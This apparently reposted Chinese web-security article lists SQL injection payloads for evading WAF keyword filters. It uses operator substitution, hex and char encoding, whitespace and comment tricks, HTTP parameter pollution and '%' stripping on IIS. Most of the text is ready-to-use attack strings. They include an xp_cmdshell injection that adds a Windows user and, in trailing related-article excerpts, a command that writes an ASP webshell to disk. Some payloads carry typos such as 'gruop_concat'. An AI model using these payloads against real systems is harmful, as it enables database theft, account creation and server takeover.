
一、 绕过waf思路


1、过滤 and,or

preg_match('/(and|or)/i', $id)
Filtered injection: 1 or 1 = 1 1 and 1 = 1
Bypassed injection: 1 || 1 = 1 1 && 1 = 1

2、过滤 and, or, union

preg_match('/(and|or|union)/i', $id)
Filtered injection: union select user, password from users
Bypassed injection: 1 || (select user from users where user_id = 1) = 'admin'

3、过滤 and, or, union, where

preg_match('/(and|or|union|where)/i', $id)
Filtered injection: 1 || (select user from users where user_id = 1) = 'admin'
Bypassed injection: 1 || (select user from users limit 1) = 'admin'

4、过滤 and, or, union, where, limit

preg_match('/(and|or|union|where|limit)/i', $id)
Filtered injection: 1 || (select user from users limit 1) = 'admin'
Bypassed injection: 1 || (select user from users group by user_id having user_id = 1) = 'admin'

5、过滤 and, or, union, where, limit, group by

preg_match('/(and|or|union|where|limit|group by)/i', $id)
Filtered injection: 1 || (select user from users group by user_id having user_id = 1) = 'admin'
Bypassed injection: 1 || (select substr(gruop_concat(user_id),1,1) user from users ) = 1

6、过滤 and, or, union, where, limit, group by, select

preg_match('/(and|or|union|where|limit|group by|select)/i', $id)
Filtered injection: 1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1
Bypassed injection: 1 || 1 = 1 into outfile 'result.txt'
Bypassed injection: 1 || substr(user,1,1) = 'a'

7、过滤 and, or, union, where, limit, group by, select, ‘

preg_match('/(and|or|union|where|limit|group by|select|\')/i', $id)
Filtered injection: 1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1
Bypassed injection: 1 || user_id is not null
Bypassed injection: 1 || substr(user,1,1) = 0x61
Bypassed injection: 1 || substr(user,1,1) = unhex(61)

8、过滤 and, or, union, where, limit, group by, select, ‘, hex

preg_match('/(and|or|union|where|limit|group by|select|\'|hex)/i', $id)
Filtered injection: 1 || substr(user,1,1) = unhex(61)
Bypassed injection: 1 || substr(user,1,1) = lower(conv(11,10,36))

9、过滤 and, or, union, where, limit, group by, select, ‘, hex, substr

preg_match('/(and|or|union|where|limit|group by|select|\'|hex|substr)/i', $id)
Filtered injection: 1 || substr(user,1,1) = lower(conv(11,10,36))
Bypassed injection: 1 || lpad(user,7,1)

10、过滤 and, or, union, where, limit, group by, select, ‘, hex, substr, 空格

preg_match('/(and|or|union|where|limit|group by|select|\'|hex|substr|\s)/i', $id)
Filtered injection: 1 || lpad(user,7,1)
ypassed injection: 1%0b||%0blpad(user,7,1)



filtered injection: 1 or 1 = 1

Bypassed injection: 1 or 1,1 or ‘1',1 or char(97)

filtered injection:  1 union select 1, table_name from information_schema.tables where table_name = 'users'
Bypassed injection:  1 union select 1, table_name from information_schema.tables where table_name between 'a' and 'z'
Bypassed injection:  1 union select 1, table_name from information_schema.tables where table_name between char(97) and char(122)
Bypassed injection:  1 union select 1, table_name from information_schema.tables where table_name between 0x61 and 0x7a
Bypassed Injection:  1 union select 1, table_name from information_schema.tables where table_name like 0x7573657273










Forbidden: http://localhost/id/1/**/||/**/lpad(first_name,7,1).html
Bypassed : http://localhost/id/1%0b||%0blpad(first_name,7,1).html



// Check for UNION attack
  // Copyright 2004(c) Raven PHP Scripts
  $blocker_row = $blocker_array[1];
  if($blocker_row['activate'] > 0) {
  if (stristr($nsnst_const['query_string'],'+union+') OR \
  stristr($nsnst_const['query_string'],'%20union%20') OR \
  stristr($nsnst_const['query_string'],'*/union/*') OR \
  stristr($nsnst_const['query_string'],' union ') OR \
  stristr($nsnst_const['query_string_base64'],'+union+') OR \
  stristr($nsnst_const['query_string_base64'],'%20union%20') OR \
  stristr($nsnst_const['query_string_base64'],'*/union/*') OR \
  stristr($nsnst_const['query_string_base64'],' union ')) { // block_ip($blocker_row);
   die("BLOCK IP 1 " );
Forbidden: http://localhost/php/?/**/union/**/select
Bypassed : http://localhost/php/?/%2A%2A/union/%2A%2A/select
Bypassed : http://localhost/php/?%2f**%2funion%2f**%2fselect


http://localhost/news.php?id=1+and+(select 1)=(select 0xA*1000)+union+select+1,2,version(),database(),user(),6,7,8,9,10–






| web server | par1 |
| :— | :— |
| ASP.NET/IIS | val1,val2 |
| ASP/IIS | val1,val2 |
| PHP/Apache | val2 |
| JSP/Tomcat | val1 |



Forbidden: http://localhost/search.aspx?q=select name,password from users
Bypassed : http://localhost/search.aspx?q=select name&q=password from users
Bypassed : http://localhost/search.aspx?q=select/*&q=*/name&q=password/*&q=*/from/*&q=*/users
Bypassed : http://localhost/news.aspx?id=1'; /*&id=1*/ EXEC /*&id=1*/ master..xp_cmdshell /*&id=1*/ net user test test /*&id=1*/ --



Unreserved: a-z, A-Z, 0-9 and _ . ! ~ * ' ()
Reserved : ; / ? : @ & = + $ ,
Unwise : { } | \ ^ [ ] `


| Query String | Apache/2.2.16,PHP/5.3.3 | IIS6/ASP |
| :— | :— | :— |
| ?test[1=2 | test_1=2 | test[1=2 |
| ?test=% | test=% | test= |
| ?test%00=1 | test= | test=1 |
| ?test=1%001 | NULL | test=1 |
| ?test+d=1+2 | test_d=1 2 | test d=1 2 |


Forbidden: http://localhost/?xp_cmdshell
Bypassed : http://localhost/?xp[cmdshell
Forbidden: http://localhost/test.asp?file=../flag.txt
Bypassed : http://localhost/test.asp?file=.%./flag.txt
Forbidden: http://localhost/news.asp?id=10 and 1=0/(select top 1 table_name from information_schema.tables)
Bypassed : http://localhost/news.asp?id=10 a%nd 1=0/(se%lect top 1 ta%ble_name fr%om info%rmation_schema.tables)





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    一. 绕过waf思路 从第一步起,一点一点去分析,然后绕过. 1.过滤 and,or preg_match('/(and|or)/i', $id) Filtered injection: 1 or 1 = 1 1 and 1 = 1 Bypassed injection: 1 || 1 = 1 1 && 1 = 1 2.过滤 and, or, union preg_match('/(and|or|union)/i', $id) Filtered injection: union selec

  • 详细聊聊关于sql注入的一些零散知识点

    目录 零.本文涉及知识点 一.sqlmap写一句马的过程(-- os-shell) 1.1 简述过程 1.2 一个小问题 二.堆叠注入: 2.1 什么是堆叠注入 2.2 如何判断存在堆叠注入? 2.3 局限性 三.union injection(联合注入) 3.1 原理 3.2 与堆叠注入的区别 四.常见的sql注入绕过姿势 4.1 Waf特性: 4.2 绕waf的核心思路: 4.3 常见的思路 五.Sql注入预编译与常见绕过姿势 5.1 概述 5.2 具体方式 5.2.1 ASC/DESC 5

  • SQL注入绕过的技巧总结

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  • Web网络安全分析SQL注入绕过技术原理

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  • SQL注入的四种防御方法总结

    目录 前言 限制数据类型 正则表达式匹配传入参数 函数过滤转义 预编译语句 总结 前言 最近了解到安全公司的面试中都问到了很多关于SQL注入的一些原理和注入类型的问题,甚至是SQL注入的防御方法.SQL注入真的算是web漏洞中的元老了,著名且危害性极大.下面这里就简单的分享一下我总结的四种SQL注入防御手段,加深理解,方便下次遇到这种问题时可以直接拿来使用.(主要是怕面试中脑壳打铁,这种情况太常见了) SQL注入占我们渗透学习中极大地一部分,拥有这很重要的地位.随着防御手段的不段深入,市面上存在

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    前言 sql注入在很早很早以前是很常见的一个漏洞.后来随着安全水平的提高,sql注入已经很少能够看到了.但是就在今天,还有很多网站带着sql注入漏洞在运行.下面这篇文章主要介绍了关于SQL注入逗号绕过的相关内容,分享出来供大家参考学习,下面话不多说了,来一起看看详细的介绍吧 1.联合查询显注绕过逗号 在联合查询时使用 UNION SELECT 1,2,3,4,5,6,7..n 这样的格式爆显示位,语句中包含了多个逗号,如果有WAF拦截了逗号时,我们的联合查询不能用了. 绕过 在显示位上替换为常见

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  • XSS & SQL注入

    XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  X Web Security - XSS & more X  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  作者: CyberPhreak 翻译: 黯魂 [S.S.T] ~介绍 在这篇文章中我将说明所有关于XSS以及更多相关的知识.通过这篇文档,我希望能让你明白什么是XSS,为什么使用XSS,以及怎样使用XSS.一旦你学会了,你将需要发挥自己的创造力,因为大多数人都修补了简单的XSS漏洞.但是他们所忘记做的是修补比

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    1.   用^转义字符来写ASP(一句话木马)文件的方法: ?;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("l"^)^</script^> >c:\mu.asp';-- ?   echo ^<%execute^(reques
